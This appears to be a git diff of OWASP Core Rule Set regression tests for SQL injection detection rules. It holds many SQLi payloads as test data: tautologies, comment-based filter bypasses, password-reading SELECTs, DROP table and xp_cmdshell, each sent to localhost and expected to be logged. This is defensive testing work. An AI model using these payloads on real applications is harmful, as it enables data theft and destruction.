+ output: + log_contains: id "942410" + - test_title: 942410-107 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-108 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-109 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-110 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-111 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-112 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-113 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-114 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-115 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-116 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-117 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-118 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index b9ea45d053..22f57a312a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -1,24 +1,24 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942420.yaml - tests: - - - test_title: 942420-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942420.yaml +tests: + - test_title: 942420-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - output: - log_contains: id "942420" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index 8221e11742..75ed809f7e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -1,24 +1,24 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942421.yaml - tests: - - - test_title: 942421-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942421.yaml +tests: + - test_title: 942421-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - method: GET - port: 80 - uri: "/" - version: HTTP/1.0 - output: - log_contains: id "942421" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942421" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index 13069c5c84..db33417af8 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942430.yaml - tests: - - - test_title: 942430-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942430.yaml +tests: + - test_title: 942430-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index 08cee4bf17..02e2cd0c55 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942431.yaml - tests: - - - test_title: 942431-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942431.yaml +tests: + - test_title: 942431-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index f1544f9414..7ae6545a57 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942432.yaml - tests: - - - test_title: 942432-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942432.yaml +tests: + - test_title: 942432-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 021d2dfb6d..d76c2bf5d0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -1,23 +1,339 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942440.yaml - tests: - - - test_title: 942440-1 - desc: "SQL Comment Sequence" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" +meta: + author: "Christian S.J. Peron, Max Leske" + description: None + enabled: true + name: 942440.yaml +tests: + - test_title: 942440-1 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/post?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" + - test_title: 942440-2 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log_contains: id "942440" + - test_title: 942440-3 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log_contains: id "942440" + - test_title: 942440-4 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log_contains: id "942440" + - test_title: 942440-5 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-6 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-7 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log_contains: id "942440" + - test_title: 942440-8 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log_contains: id "942440" + - test_title: 942440-9 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log_contains: id "942440" + - test_title: 942440-10 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log_contains: id "942440" + - test_title: 942440-11 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log_contains: id "942440" + - test_title: 942440-12 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log_contains: id "942440" + - test_title: 942440-13 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-14 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-15 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log_contains: id "942440" + - test_title: 942440-16 + desc: "Avoid False Positive on JWT (body)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_title: 942440-17 + desc: "Avoid False Positive on JWT (cookie)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + no_log_contains: id "942440" + - test_title: 942440-18 + desc: "Avoid False Positive on JWT (querystring)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_title: 942440-19 + desc: "False positive against Facebook click identifier" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + no_log_contains: id "942440" + - test_title: 942440-20 + desc: "False positive against Google click identifier" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + no_log_contains: id "942440" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index dd23841ee6..a308e3be75 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -1,92 +1,92 @@ --- - meta: - author: "William Woodson" - description: None - enabled: true - name: 942450.yaml - tests: - - - test_title: 942450-1 +meta: + author: "William Woodson" + description: None + enabled: true + name: 942450.yaml +tests: + - test_title: 942450-1 desc: "SQL Hex Encoding" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - - test_title: 942450-2 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-2 desc: "SQL Hex Encoding" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - - test_title: 942450-3 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-3 desc: "SQL Hex Encoding" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - - test_title: 942450-4 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-4 desc: "SQL Hex Encoding - negative" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - - test_title: 942450-5 + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_title: 942450-5 desc: "SQL Hex Encoding - negative" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - method: POST - uri: "/" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml new file mode 100644 index 0000000000..e2776bd052 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -0,0 +1,41 @@ +--- +meta: + author: "Franziska Bühler" + description: None + enabled: true + name: 942460.yaml +tests: + - test_title: 942460-1 + desc: "Repetitive Non-Word Characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=foo...." + version: HTTP/1.1 + output: + log_contains: id "942460" + - test_title: 942460-2 + desc: "Repetitive Non-Word Characters negative test only 3 characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=foo..." + version: HTTP/1.1 + output: + no_log_contains: id "942460" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index dc6f8b9564..0b569ededc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -1,177 +1,193 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942470.yaml - tests: - - - test_title: 942470-1 +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942470.yaml +tests: + - test_title: 942470-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-2 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-3 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-4 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-5 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xp_regread" - version: 